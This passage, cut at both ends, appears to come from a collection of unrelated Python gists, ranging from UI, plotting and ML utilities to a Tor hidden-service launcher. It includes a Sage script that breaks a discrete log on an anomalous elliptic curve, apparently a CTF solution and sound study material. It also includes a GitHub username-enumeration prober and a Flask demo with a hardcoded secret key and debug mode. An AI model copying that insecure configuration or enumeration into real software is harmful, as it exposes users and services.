suffixes_table = [('bytes',0),('KB',0),('MB',1),('GB',2),('TB',2), ('PB',2)]
num = float(size_bytes)
for suffix, precision in suffixes_table:
if num < 1024.0:
break
num /= 1024.0
if precision == 0:
formatted_size = "%d" % num
else:
formatted_size = str(round(num, ndigits=precision))
return "%s %s" % (formatted_size, suffix)
class TreeNode (object):
def __init__(self):
self.expanded = False
self.children = None
self.leaf = True
self.title = ''
self.subtitle = ''
self.icon_name = None
self.level = 0
self.enabled = True
def expand_children(self):
self.expanded = True
self.children = []
def collapse_children(self):
self.expanded = False
def __repr__(self):
return '<TreeNode: "%s"%s>' % (self.title, ' (expanded)' if self.expanded else '')
class FileTreeNode (TreeNode):
def __init__(self, path, show_size=True, select_dirs=True,
file_pattern=None):
TreeNode.__init__(self)
self.path = path
self.title = os.path.split(path)[1]
self.select_dirs = select_dirs
self.file_pattern = file_pattern
is_dir = os.path.isdir(path)
self.leaf = not is_dir
ext = os.path.splitext(path)[1].lower()
if is_dir:
self.icon_name = 'Folder'
elif ext == '.py':
self.icon_name = 'FilePY'
elif ext == '.pyui':
self.icon_name = 'FileUI'
elif ext in ('.png', '.jpg', '.jpeg', '.gif'):
self.icon_name = 'FileImage'
else:
self.icon_name = 'FileOther'
self.show_size = show_size
if not is_dir and show_size:
self.subtitle = human_size((os.stat(self.path).st_size))
if is_dir and not select_dirs:
self.enabled = False
elif not is_dir:
filename = os.path.split(path)[1]
self.enabled = not file_pattern or re.match(file_pattern, filename)
@property
def cmp_title(self):
return self.title.lower()
def expand_children(self):
if self.children is not None:
self.expanded = True
return
files = os.listdir(self.path)
children = []
for filename in files:
if filename.startswith('.'):
continue
full_path = os.path.join(self.path, filename)
node = FileTreeNode(full_path, self.show_size, self.select_dirs, self.file_pattern)
node.level = self.level + 1
children.append(node)
self.expanded = True
self.children = sorted(children, key=attrgetter('leaf', 'cmp_title'))
# Just a simple demo of a custom TreeNode class... The TreeDialogController should be initialized with async_mode=True when using this class.
class FTPTreeNode (TreeNode):
def __init__(self, host, path=None, level=0):
TreeNode.__init__(self)
self.host = host
self.path = path
self.level = level
if path:
self.title = os.path.split(path)[1]
else:
self.title = self.host
self.leaf = path and len(os.path.splitext(path)[1]) > 0
self.icon_name = 'FileOther' if self.leaf else 'Folder'
def expand_children(self):
ftp = ftplib.FTP(self.host, timeout=10)
ftp.login('anonymous')
names = ftp.nlst(self.path or '')
ftp.quit()
self.children = [FTPTreeNode(self.host, name, self.level+1) for name in names]
self.expanded = True
class TreeDialogController (object):
def __init__(self, root_node, allow_multi=False, async_mode=False):
self.async_mode = async_mode
self.allow_multi = allow_multi
self.selected_entries = None
self.table_view = ui.TableView()
self.table_view.frame = (0, 0, 500, 500)
self.table_view.data_source = self
self.table_view.delegate = self
self.table_view.flex = 'WH'
self.table_view.allows_multiple_selection = True
self.table_view.tint_color = 'gray'
self.view = ui.View(frame=self.table_view.frame)
self.view.add_subview(self.table_view)
self.view.name = root_node.title
self.busy_view = ui.View(frame=self.view.bounds, flex='WH', background_color=(0, 0, 0, 0.35))
hud = ui.View(frame=(self.view.center.x - 50, self.view.center.y - 50, 100, 100))
hud.background_color = (0, 0, 0, 0.7)
hud.corner_radius = 8.0
hud.flex = 'TLRB'
spinner = ui.ActivityIndicator()
spinner.style = ui.ACTIVITY_INDICATOR_STYLE_WHITE_LARGE
spinner.center = (50, 50)
spinner.start_animating()
hud.add_subview(spinner)
self.busy_view.add_subview(hud)
self.busy_view.alpha = 0.0
self.view.add_subview(self.busy_view)
self.done_btn = ui.ButtonItem(title='Done', action=self.done_action)
if self.allow_multi:
self.view.right_button_items = [self.done_btn]
self.done_btn.enabled = False
self.root_node = root_node
self.entries = []
self.flat_entries = []
if self.async_mode:
self.set_busy(True)
t = threading.Thread(target=self.expand_root)
t.start()
else:
self.expand_root()
def expand_root(self):
self.root_node.expand_children()
self.set_busy(False)
self.entries = self.root_node.children
self.flat_entries = self.entries
self.table_view.reload()
def flatten_entries(self, entries, dest=None):
if dest is None:
dest = []
for entry in entries:
dest.append(entry)
if not entry.leaf and entry.expanded:
self.flatten_entries(entry.children, dest)
return dest
def rebuild_flat_entries(self):
self.flat_entries = self.flatten_entries(self.entries)
def tableview_number_of_rows(self, tv, section):
return len(self.flat_entries)
def tableview_cell_for_row(self, tv, section, row):
cell = ui.TableViewCell()
entry = self.flat_entries[row]
level = entry.level - 1
image_view = ui.ImageView(frame=(44 + 20*level, 5, 34, 34))
label_x = 44+34+8+20*level
label_w = cell.content_view.bounds.w - label_x - 8
if entry.subtitle:
label_frame = (label_x, 0, label_w, 26)
sub_label = ui.Label(frame=(label_x, 26, label_w, 14))
sub_label.font = ('<System>', 12)
sub_label.text = entry.subtitle
sub_label.text_color = '#999'
cell.content_view.add_subview(sub_label)
else:
label_frame = (label_x, 0, label_w, 44)
label = ui.Label(frame=label_frame)
if entry.subtitle:
label.font = ('<System>', 15)
else:
label.font = ('<System>', 18)
label.text = entry.title
label.flex = 'W'
cell.content_view.add_subview(label)
if entry.leaf and not entry.enabled:
label.text_color = '#999'
cell.content_view.add_subview(image_view)
if not entry.leaf:
has_children = entry.expanded
btn = ui.Button(image=ui.Image.named('CollapseFolder' if has_children else 'ExpandFolder'))
btn.frame = (20*level, 0, 44, 44)
btn.action = self.expand_dir_action
cell.content_view.add_subview(btn)
if entry.icon_name:
image_view.image = ui.Image.named(entry.icon_name)
else:
image_view.image = None
cell.selectable = entry.enabled
return cell
def row_for_view(self, sender):
'''Helper to find the row index for an 'expand' button'''
cell = ObjCInstance(sender)
while not cell.isKindOfClass_(ObjCClass('UITableViewCell')):
cell = cell.superview()
return ObjCInstance(self.table_view).indexPathForCell_(cell).row()
def expand_dir_action(self, sender):
'''Invoked by 'expand' button'''
row = self.row_for_view(sender)
entry = self.flat_entries[row]
if entry.expanded:
sender.image = ui.Image.named('ExpandFolder')
else:
sender.image = ui.Image.named('CollapseFolder')
self.toggle_dir(row)
self.update_done_btn()
def toggle_dir(self, row):
'''Expand or collapse a folder node'''
entry = self.flat_entries[row]
if entry.expanded:
entry.collapse_children()
old_len = len(self.flat_entries)
self.rebuild_flat_entries()
num_deleted = old_len - len(self.flat_entries)
deleted_rows = range(row + 1, row + num_deleted + 1)
self.table_view.delete_rows(deleted_rows)
else:
if self.async_mode:
self.set_busy(True)
expand = functools.partial(self.do_expand, entry, row)
t = threading.Thread(target=expand)
t.start()
else:
self.do_expand(entry, row)
def do_expand(self, entry, row):
'''Actual folder expansion (called on background thread if async_mode is enabled)'''
entry.expand_children()
self.set_busy(False)
old_len = len(self.flat_entries)
self.rebuild_flat_entries()
num_inserted = len(self.flat_entries) - old_len
inserted_rows = range(row + 1, row + num_inserted + 1)
self.table_view.insert_rows(inserted_rows)
def tableview_did_select(self, tv, section, row):
self.update_done_btn()
def tableview_did_deselect(self, tv, section, row):
self.update_done_btn()
def update_done_btn(self):
'''Deactivate the done button when nothing is selected'''
selected = [self.flat_entries[i[1]] for i in self.table_view.selected_rows if self.flat_entries[i[1]].enabled]
if selected and not self.allow_multi:
self.done_action(None)
else:
self.done_btn.enabled = len(selected) > 0
def set_busy(self, flag):
'''Show/hide spinner overlay'''
def anim():
self.busy_view.alpha = 1.0 if flag else 0.0
ui.animate(anim)
def done_action(self, sender):
self.selected_entries = [self.flat_entries[i[1]] for i in self.table_view.selected_rows if self.flat_entries[i[1]].enabled]
self.view.close()
def file_picker_dialog(title=None, root_dir=None, multiple=False,
select_dirs=False, file_pattern=None, show_size=True):
if root_dir is None:
root_dir = os.path.expanduser('~/Documents')
if title is None:
title = os.path.split(root_dir)[1]
root_node = FileTreeNode(os.path.expanduser('~/Documents'), show_size, select_dirs, file_pattern)
root_node.title = title or ''
picker = TreeDialogController(root_node, allow_multi=multiple)
picker.view.present('sheet')
picker.view.wait_modal()
if picker.selected_entries is None:
return None
paths = [e.path for e in picker.selected_entries]
if multiple:
return paths
else:
return paths[0]
def ftp_dialog(host='mirrors.kernel.org'):
# This is just a demo of how TreeDialogController is
# extensible with custom TreeNode subclasses, so there
# aren't as many options as for the regular file dialog.
root_node = FTPTreeNode(host)
picker = TreeDialogController(root_node, async_mode=True)
picker.view.present('sheet')
picker.view.wait_modal()
if picker.selected_entries:
return picker.selected_entries[0].path
def main():
py_files = file_picker_dialog('Pick some .py files', multiple=True, select_dirs=False, file_pattern=r'^.*\.py$')
print('Picked from ~/Documents:', py_files)
ftp_file = ftp_dialog()
print('Picked from FTP server:', ftp_file)
if __name__ == '__main__':
main()
```
#### File: hard-gists/e41abdd59c5308eacf84/snippet.py
```python
from __future__ import print_function, division
import sys
import mayavi # pylint: disable=import-error,unused-import
from mayavi import mlab # pylint: disable=import-error
from traits.trait_errors import TraitError
__author__ = "<NAME>"
__copyright__ = "Copyright 2015"
__license__ = "MIT License"
_prev_offscreen_state = None
def _resize_window(size, fig=None):
if fig is None:
fig = mlab.gcf()
try:
# scene.set_size doesn't seem to work on linux && os x, so
# go into the backend and do it by hand
if sys.platform == "darwin" or sys.platform.startswith('linux'):
toolkit = mayavi.ETSConfig.toolkit
if toolkit == 'qt4':
sc = fig.scene
window_height = sc.control.parent().size().height()
render_height = sc.render_window.size[1]
h = window_height - render_height
sc.control.parent().resize(size[0], size[1] + h)
elif toolkit == 'wx':
w, h = size[0], size[1]
fig.scene.control.Parent.Parent.SetClientSizeWH(w, h)
else:
print("Unknown mayavi backend {0} (not qt4 or "
"wx); not resizing.".format(toolkit), file=sys.stderr)
else:
fig.scene.set_size(size)
except Exception as e:
print("Resize didn't work:: {0}".format(repr(e)), file=sys.stderr)
def imayavi_show_window(fig, debug=False):
"""Try to show the window; only does something on Qt backend"""
try:
# fig.scene.control.parent().show()
fig.scene.control.parent().showNormal()
except Exception as e: # pylint: disable=broad-except,unused-variable
if debug:
print("Window show didn't work::", repr(e))
def imayavi_hide_window(fig, debug=False):
"""Try to hide the window; only does something on Qt backend"""
try:
# fig.scene.control.parent().hide()
fig.scene.control.parent().showMinimized()
except Exception as e: # pylint: disable=broad-except,unused-variable
if debug:
print("Window hide didn't work::", repr(e))
def imayavi_show_inline(fig=None, size=None, antialiased=True, hide=True,
**kwargs):
"""Display a mayavi figure inline in an ipython notebook.
This function takes a screenshot of a figure and blits it to a matplotlib
figure using matplotlib.pyplot.imshow()
Args:
fig: A mayavi figure, if not specified, uses mlab.gcf()
size (None, tuple): if given, resize the scene in pixels (x, y)
hide (bool): if True, try to hide the render window
kwargs: passed to mayavi.mlab.screenshot()
"""
from matplotlib import pyplot as plt
if fig is None:
fig = mlab.gcf()
# try to show the window... Qt backend only, necessary if this is
# the 2nd call, and we hid the previous window
# imayavi_show_window(fig)
if size is not None:
_resize_window(size, fig=fig)
pixmap = mlab.screenshot(fig, antialiased=antialiased, **kwargs)
# try to hide the window... Qt backend only
if hide:
imayavi_hide_window(fig)
pltfig = plt.figure()
dpi = pltfig.get_dpi()
pltfig.set_size_inches([s / dpi for s in fig.scene.get_size()])
ax = pltfig.gca()
ax.imshow(pixmap)
ax.axis('off')
plt.show()
def imayavi_show(fig=None, size=None, stop=True):
"""shortcut for `mayavi.mlab.show(stop=True)`"""
if sys.platform != "darwin":
print("Warning: Since linux uses offscreen rendering, imayavi_show()\n"
"won't work. To interact with a plot, turn off\n"
"offscreen rendering and recreate the plot. Remember to\n"
"re-enable offscreen rendering if making future inline plots.\n",
file=sys.stderr)
if fig is None:
fig = mlab.gcf()
imayavi_show_window(fig)
if size is not None:
_resize_window(size, fig=fig)
mlab.show(stop=stop)
def imayavi_remove_source(src):
"""Safely remove a specific vtk source
Args:
src (vtk_data_source): vtk data source to remove
"""
src.stop()
try:
try:
src.data.release_data()
except TraitError:
src.data.release_data_flag = 1
src.cell_scalars_name = ''
src.cell_tensors_name = ''
src.cell_vectors_name = ''
src.point_scalars_name = ''
src.point_tensors_name = ''
src.point_vectors_name = ''
except AttributeError:
pass
src.start()
src.stop()
src.remove()
def imayavi_clear_data(scenes=None):
"""Workaround for Mayavi / VTK memory leak
This is needed when Mayavi/VTK keeps a reference to source data
when you would expect it to be freed like on a call to `mlab.clf()`
or when removing sources from the pipeline.
Note:
This must be called when the pipeline still has the source, so
before a call to `mlab.clf()`, etc.
1. Set release_data_flag on all sources' data
2. Remove reference to the data
3. Remove the data source
Args:
scene (None, mayavi.core.scene.Scene, or 'all'): if None, gets
current scene; if Scene object, just that one; if 'all',
act on all scenes in the current engine. Can also be a list
of Scene objects
"""
if scenes is None:
scenes = [mlab.get_engine().current_scene]
elif scenes == "all":
scenes = mlab.get_engine().scenes
if not isinstance(scenes, (list, tuple)):
scenes = [scenes]
if all(s is None for s in scenes):
return
for s in scenes:
s.stop()
for child in list(s.children):
imayavi_remove_source(child)
s.start()
return
def load_ipython_extension(ipython):
ipython.enable_matplotlib(gui="inline")
# linux needs to render offscreen, OS X + Qt apparently doesn't
global _prev_offscreen_state # pylint: disable=global-statement
_prev_offscreen_state = mlab.options.offscreen
if sys.platform != "darwin":
mlab.options.offscreen = True
ipython.push("mayavi", interactive=True)
ipython.push("mlab", interactive=True)
ipython.push("imayavi_show_inline", interactive=True)
ipython.push("imayavi_show", interactive=True)
ipython.push("imayavi_remove_source", interactive=True)
ipython.push("imayavi_clear_data", interactive=True)
ipython.push("imayavi_show_window", interactive=True)
ipython.push("imayavi_hide_window", interactive=True)
def unload_ipython_extension(ipython):
if sys.platform != "darwin":
mlab.options.offscreen = _prev_offscreen_state
ipython.drop_by_id(dict(imayavi_show_inline=imayavi_show_inline,
imayavi_show=imayavi_show,
imayavi_remove_source=imayavi_remove_source,
imayavi_clear_data=imayavi_clear_data,
imayavi_show_window=imayavi_show_window,
imayavi_hide_window=imayavi_hide_window))
##
## EOF
##
```
#### File: hard-gists/e4907ccc9f6c1bb49b17/snippet.py
```python
from itertools import product
from sys import argv
from random import shuffle
from urllib.request import urlopen
from urllib.error import HTTPError
def main(args):
letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
combinations = [''.join(i) for i in product(letters, repeat=(int(args[1]) if len(args) > 1 else 2))]
shuffle(combinations)
for username in combinations:
try:
urlopen('https://github.com/' + username)
except HTTPError:
print(username + " is available!")
if __name__ == '__main__':
main(argv)
```
#### File: hard-gists/e5fe0a832872c2b1cebe473c7cf6fb07/snippet.py
```python
import websocket
import sys
from datetime import datetime, timedelta, timezone
import sched, time
import json
JST = timezone(timedelta(hours=+9), 'JST')
class GdaxStream():
endpoint = "wss://ws-feed.gdax.com"
def __init__(self):
#websocket.enableTrace(True)
self.ws = websocket.WebSocketApp(
GdaxStream.endpoint,
on_message = self.on_message,
on_error = self.on_error,
on_close = self.on_close
)
self.ws.on_open = self.on_open
try:
self.run()
except KeyboardInterrupt:
self.ws.close()
def run(self):
print("### run ###")
self.ws.run_forever()
pass
def on_message(self, ws, message):
now = datetime.now(JST)
print(str(now), message)
def on_error(self, ws, error):
print(error)
sys.exit()
def on_close(self, ws):
print("### closed ###")
def on_open(self, ws):
print("### open ###")
ws.send(json.dumps({"type": "subscribe","product_ids": ["BTC-USD"]}))
if __name__=="__main__":
GdaxStream()
```
#### File: hard-gists/e76e7c2a2aff228d7807/snippet.py
```python
from sage.all import *
p = 16857450949524777441941817393974784044780411511252189319
A = 16857450949524777441941817393974784044780411507861094535
B = 77986137112576
E = EllipticCurve(GF(p), [A, B])
print E.order() == p
g = E(5732560139258194764535999929325388041568732716579308775, 14532336890195013837874850588152996214121327870156054248)
v = E(2609506039090139098835068603396546214836589143940493046, 8637771092812212464887027788957801177574860926032421582)
def hensel_lift(curve, p, point):
A, B = map(long, (E.a4(), E.a6()))
x, y = map(long, point.xy())
fr = y**2 - (x**3 + A*x + B)
t = (- fr / p) % p
t *= inverse_mod(2 * y, p) # (y**2)' = 2 * y
t %= p
new_y = y + p * t
return x, new_y
# lift points
x1, y1 = hensel_lift(E, p, g)
x2, y2 = hensel_lift(E, p, v)
# calculate new A, B (actually, they will be the same here)
mod = p ** 2
A2 = y2**2 - y1**2 - (x2**3 - x1**3)
A2 = A2 * inverse_mod(x2 - x1, mod)
A2 %= mod
B2 = y1**2 - x1**3 - A2 * x1
B2 %= mod
# new curve
E2 = EllipticCurve(IntegerModRing(p**2), [A2, B2])
# calculate dlog
g2s = (p - 1) * E2(x1, y1)
v2s = (p - 1) * E2(x2, y2)
x1s, y1s = map(long, g2s.xy())
x2s, y2s = map(long, v2s.xy())
dx1 = (x1s - x1) / p % p
dx2 = (y1s - y1) / p
dy1 = (x2s - x2)
dy2 = (y2s - y2) % p
print "%d, %d, %d, %d, %d" % (dx1, dy1, dx2, dy2, p)
m = dy1 * inverse_mod(dx1, p) * dx2 * inverse_mod(dy2, p)
m %= p
print m
```
#### File: hard-gists/e99c114a5b33cd2da538/snippet.py
```python
import sys
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
app = Flask(__name__)
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
# Set echo for debug purposes
app.config['SQLALCHEMY_ECHO'] = True
# Create db instance
db = SQLAlchemy(app)
# Create admin instance
admin = Admin(app)
class Product(db.Model):
__tablename__ = 'product'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(200), nullable=False)
# cover image foreign key
# use_alter=True along with name='' adds this foreign key after Image has been created to avoid circular dependency
cover_id = db.Column(db.Integer, db.ForeignKey('image.id', use_alter=True, name='fk_product_cover_id'))
# cover image one-to-one relationship
# set post_update=True to avoid circular dependency during
cover = db.relationship('Image', foreign_keys=cover_id, post_update=True)
class Image(db.Model):
__tablename__ = 'image'
id = db.Column(db.Integer, primary_key=True)
path = db.Column(db.String(200), nullable=False)
product_id = db.Column(db.Integer, db.ForeignKey(Product.id))
# product gallery many-to-one
product = db.relationship(Product, foreign_keys=product_id, backref='images')
# nothing special was need in Image, all circular dependencies were solved in Product
# Need to implement custom Image list
class ProductView(ModelView):
def __init__(self, session, **kwargs):
super(ProductView, self).__init__(Product, session,**kwargs)
class ImageView(ModelView):
def __init__(self, session, **kwargs):
super(ImageView, self).__init__(Image, session,**kwargs)
admin.add_view(ProductView(db.session))
admin.add_view(ImageView(db.session))
if __name__ == '__main__':
# Create tables
db.create_all()
# Run in debug mode
app.debug = True
# Go!
app.run()
```
#### File: hard-gists/e9fb36ca2220a167b7ed/snippet.py
```python
from PIL import Image
import numpy as np
import sys, math
if len(sys.argv) == 1:
print("Usage: img2irc.py image.png [-rgb]")
sys.exit(1)
image = sys.argv[1]
try:
rgb = True if sys.argv[2] == "-rgb" else False
except IndexError:
rgb = False
if not rgb:
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
img = Image.open(image).convert('RGBA')
arr = np.array(np.asarray(img).astype('float'))
def distance(c1, c2):
if rgb:
(r1,g1,b1) = (c1[0], c1[1], c1[2])
(r2,g2,b2) = (c2[0], c2[1], c2[2])
else:
rgb1 = sRGBColor(c1[0], c1[1], c1[2])
rgb2 = sRGBColor(c2[0], c2[1], c2[2])
lab1 = convert_color(rgb1, LabColor)
lab2 = convert_color(rgb2, LabColor)
(r1,g1,b1) = lab1.lab_l, lab1.lab_a, lab1.lab_b
(r2,g2,b2) = lab2.lab_l, lab2.lab_a, lab2.lab_b
return math.sqrt((r1 - r2)**2 + (g1 - g2) ** 2 + (b1 - b2) **2)
ircColors = {(211, 215, 207): 0,
(46, 52, 54): 1,
(52, 101, 164): 2,
(78, 154, 6): 3,
(204, 0, 0): 4,
(143, 57, 2): 5,
(92, 53, 102): 6,
(206, 92, 0): 7,
(196, 160, 0): 8,
(115, 210, 22): 9,
(17, 168, 121): 10,
(88, 161, 157): 11,
(87, 121, 158): 12,
(160, 67, 101): 13,
(85, 87, 83): 14,
(136, 137, 133): 15}
colors = list(ircColors.keys())
for line in arr:
row = ""
for pixel in line:
if pixel[3] == 0:
row += "\003 " # \003 to close any potential open color tag
else:
closest_colors = sorted(colors, key=lambda color: distance(color, pixel))
closest_color = closest_colors[0]
row += "\003{0},{0} ".format(ircColors[closest_color])
print(row)
```
#### File: hard-gists/ea46edc315b0f94d03b9/snippet.py
```python
import codecs
import os
import sys
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
def get_document_filenames(document_path='/home/tool/document_text'):
return [os.path.join(document_path, each)
for each in os.listdir(document_path)]
def create_vectorizer():
# Arguments here are tweaked for working with a particular data set.
# All that's really needed is the input argument.
return TfidfVectorizer(input='filename', max_features=200,
token_pattern='(?u)\\b[a-zA-Z]\\w{2,}\\b',
max_df=0.05,
stop_words='english',
ngram_range=(1, 3))
def display_scores(vectorizer, tfidf_result):
# http://stackoverflow.com/questions/16078015/
scores = zip(vectorizer.get_feature_names(),
np.asarray(tfidf_result.sum(axis=0)).ravel())
sorted_scores = sorted(scores, key=lambda x: x[1], reverse=True)
for item in sorted_scores:
print "{0:50} Score: {1}".format(item[0], item[1])
def main():
vectorizer = create_vectorizer()
tfidf_result = vectorizer.fit_transform(get_document_filenames())
display_scores(vectorizer, tfidf_result)
if __name__ == '__main__':
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
main()
```
#### File: hard-gists/ec0dbce5688e6fcd2cb91ac1fb7d03ca/snippet.py
```python
import lx
import lx.symbol as symbols
# Save this into your MODO scripts directory.
# Example usage:
# Find symbols with value of enable
# import symbolUtils as su
# su.find('enable', printOut=True)
# Find symbols with value containing enable
# import symbolUtils as su
# su.contains('enable', printOut=True)
# Find symbols containing ENABLE
# import symbolUtils as su
# su.findSymbols('ENABLE', printOut=True)
def find(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() == getattr(symbols, x).lower()]
else:
res = [x for x in dir(symbols) if value == getattr(symbols, x)]
if printOut:
printList(res, withlxsymbol)
return res
def contains(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() in getattr(symbols, x).lower()]
else:
res = [x for x in dir(symbols) if value in getattr(symbols, x)]
if printOut:
printList(res, withlxsymbol)
return res
def findSymbols(value, ignoreCase=False, printOut=False, withlxsymbol=False):
res = []
if ignoreCase:
res = [x for x in dir(symbols) if value.lower() in x.lower()]
else:
res = [x for x in dir(symbols) if value in x]
if printOut:
printList(res, withlxsymbol)
return res
def printList(entries, withlxsymbol=False):
if withlxsymbol:
print '\nlx.symbol.'.join(entries)
else:
print '\n'.join(entries)
```
#### File: hard-gists/ec8f1689bfde3ce9a920/snippet.py
```python
import sys, threading, time
from stem.control import Controller
from stem import SocketError, UnsatisfiableRequest
import stem.process
from stem.util import term
from flask import Flask
import socks
WEB_PORT = 8080
CONTROL_PORT = 7001
SOCKS_PORT = 7000
HIDDEN_SERVICE_DIR = '/tmp/tor/'
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
def start_web_app():
print 'Starting web app'
app.run(port=WEB_PORT, threaded=True)
def print_bootstrap_lines(line):
if "Bootstrapped " in line:
print(term.format(line, term.Color.BLUE))
def main():
print(term.format("Starting Tor:\n", term.Attr.BOLD))
tor_process = stem.process.launch_tor_with_config(
config = {
'SocksPort': str(SOCKS_PORT),
'ControlPort': str(CONTROL_PORT),
'ExitNodes': '{ru}',
},
init_msg_handler = print_bootstrap_lines,
)
# Start the flask web app in a separate thread
t = threading.Thread(target=start_web_app)
t.daemon = True
t.start()
# Connect to the Tor control port
try:
c = Controller.from_port(port=CONTROL_PORT)
c.authenticate()
except SocketError:
print 'Cannot connect to Tor control port'
sys.exit()
# Create an ephemeral hidden service
try:
print 'Creating hidden service'
result = c.create_hidden_service(HIDDEN_SERVICE_DIR, 80, target_port=8080)
print " * Created host: %s" % result.hostname
onion = result.hostname
except UnsatisfiableRequest:
print 'Cannot create ephemeral hidden service, Tor version is too old'
sys.exit()
except Exception, e:
print e
sys.exit()
t.join()
if __name__ == '__main__':
main()
```
#### File: hard-gists/ec9c9074373d2443594a/snippet.py
```python
import sys
import os.path
import argparse
import numpy as np
from scipy.misc import imread, imresize
import scipy.io
import cPickle as pickle
parser = argparse.ArgumentParser()
parser.add_argument('--caffe',
help='path to caffe installation')
parser.add_argument('--model_def',
help='path to model definition prototxt')
parser.add_argument('--model',
help='path to model parameters')
parser.add_argument('--files',
help='path to a file contsining a list of images')
parser.add_argument('--gpu',
action='store_true',
help='whether to use gpu training')
parser.add_argument('--layer',help='which layer to extract features e.g conv5_3')
parser.add_argument('--out',help='name of the pickle file where to store the features')
args = parser.parse_args()
if args.caffe:
caffepath = args.caffe + '/python'
sys.path.append(caffepath)
import caffe
def predict(in_data, net):
"""
Get the features for a batch of data using network
Inputs:
in_data: data batch
"""
out = net.forward(**{net.inputs[0]: in_data})
out_pool = net.forward(data = in_data, end = args.layer)
features = out_pool[args.layer]
return features
def batch_predict(filenames, net):
"""
Get the features for all images from filenames using a network
Inputs:
filenames: a list of names of image files
Returns:
an array of feature vectors for the images in that file
"""
N, C, H, W = net.blobs[net.inputs[0]].data.shape
Nf = len(filenames)
Hi, Wi, _ = imread(filenames[0]).shape
F = net.blobs[args.layer].data.shape
allftrs = np.zeros((Nf,) + F[1:])
for i in range(0, Nf, N):
in_data = np.zeros((N, C, H, W), dtype=np.float32)
batch_range = range(i, min(i+N, Nf))
batch_filenames = [filenames[j] for j in batch_range]
Nb = len(batch_range)
batch_images = np.zeros((Nb, 3, H, W))
for j,fname in enumerate(batch_filenames):
im = imread(fname)
if len(im.shape) == 2:
im = np.tile(im[:,:,np.newaxis], (1,1,3))
# RGB -> BGR
im = im[:,:,(2,1,0)]
# mean subtraction
im = im - np.array([103.939, 116.779, 123.68])
# resize
im = imresize(im, (H, W), 'bicubic')
# get channel in correct dimension
im = np.transpose(im, (2, 0, 1))
batch_images[j,:,:,:] = im
# insert into correct place
in_data[0:len(batch_range), :, :, :] = batch_images
# predict features
ftrs = predict(in_data, net)
for j in range(len(batch_range)):
allftrs[i+j,:] = ftrs[j,:]
print 'Done %d/%d files' % (i+len(batch_range), len(filenames))
return allftrs
if args.gpu:
caffe.set_mode_gpu()
else:
caffe.set_mode_cpu()
net = caffe.Net(args.model_def, args.model, caffe.TEST)
print 'list of all blobs and their shapes:'
for blob in net.blobs:
print blob,':',net.blobs[blob].data.shape
filenames = []
base_dir = os.path.dirname(args.files)
with open(args.files) as fp:
for line in fp:
filename = os.path.join(base_dir, line.strip().split()[0])
filenames.append(filename)
allftrs = batch_predict(filenames, net)
pkl_output = {}
pkl_output['filenames'] = filenames
pkl_output['features'] = allftrs
if args.out:
# store the features in a pickle file
with open(args.out, 'w') as fp:
pickle.dump(pkl_output, fp)
#scipy.io.savemat(os.path.join(base_dir, args.out+'.vgg_feats.mat'), mdict = {'features': np.transpose(allftrs), 'filenames' : filenames})
```
#### File: hard-gists/ee837b44613ce93064aa/snippet.py
```python
import six
from rest_framework import serializers, exceptions, parsers
class PullSerializerMixin(object):
pull_model = None
def __init__(self, *args, **kwargs):
self.pull_model = kwargs.pop('pull_model', self.pull_model)
super(PullSerializerMixin, self).__init__(*args, **kwargs)
def get_pull_model(self):
if not self.pull_model:
raise NotImplementedError("pull_model not specified")
return self.pull_model
def pull_fields(pull_spec):
"""
identify fields required at root of pull spec
"""
fields = []
for item in pull_spec:
if isinstance(item, dict):
for k in item.iterkeys():
fields.append(k)
elif isinstance(item, basestring):
fields.append(item)
else:
raise AssertionError("Expected dicts and strings, got {}".format(item))
return set(fields)
def pull_field_spec(pull_spec, field_name):
"""
Looks for recursive field definition in pull spec.
Match is dict key of field_name, associated value is field pull spec.
"""
for item in pull_spec:
if isinstance(item, dict):
for k, v in item.iteritems():
if field_name == k:
return v
def select_keys(m, ks):
"""
Destructively select keys on map, uses m.pop(k).
"""
for k in set(m.keys()) - set(ks):
m.pop(k)
class PullMixin(object):
"""
Pull API integration. Serializer fields will be filtered
based on the recursive pull spec provided as query param.
TODO: This seems to cause a conflict with setting metadata_class
which I'm yet to investigate.
"""
serializer_pull_field_mapping = {}
default_pull_parser = parsers.JSONParser
pull_allowed_methods = ['GET']
def pull_parser(self):
for parser in self.request.parsers:
if parser.media_type == self.request.accepted_media_type:
return parser
return self.default_pull_parser
@property
def pull_spec(self):
if not hasattr(self, "_pull"):
self._pull = None
if 'pull' in self.request.query_params:
try:
parser_class = self.pull_parser()
self._pull = parser_class().parse(
six.StringIO(self.request.query_params['pull'])
)
except ValueError as e:
pass
return self._pull
def get_serializer(self, *args, **kwargs):
serializer = super(PullMixin, self).get_serializer(*args, **kwargs)
if self.pull_spec and self.request.method in self.pull_allowed_methods:
self.recursive_select_keys(serializer, self.pull_spec)
return serializer
def get_pull_serializer(self, model, *args, **kwargs):
"""
Return the serializer instance that should be used for serializing model.
"""
serializer_class = self.get_pull_serializer_class(model)
return serializer_class(*args, **kwargs)
def get_pull_serializer_class(self, model):
"""
Return the class to use for the model serializer.
Defaults to using `self.pull_serializer_class`.
"""
if model in self.serializer_pull_field_mapping:
return self.serializer_pull_field_mapping[model]
raise exceptions.PermissionDenied(
"Model not whitelisted for pull: {}"
.format(model._meta))
def recursive_select_keys(self, serializer, pull_spec):
"""
Destructively and recursively filter serializer fields
based on pull_spec
"""
if not pull_spec: return
if isinstance(serializer, serializers.ListSerializer):
serializer = serializer.child
spec_fields = pull_fields(pull_spec)
if not "*" in spec_fields:
select_keys(serializer.fields, spec_fields)
for field_name, field in serializer.fields.iteritems():
field_spec = pull_field_spec(pull_spec, field_name)
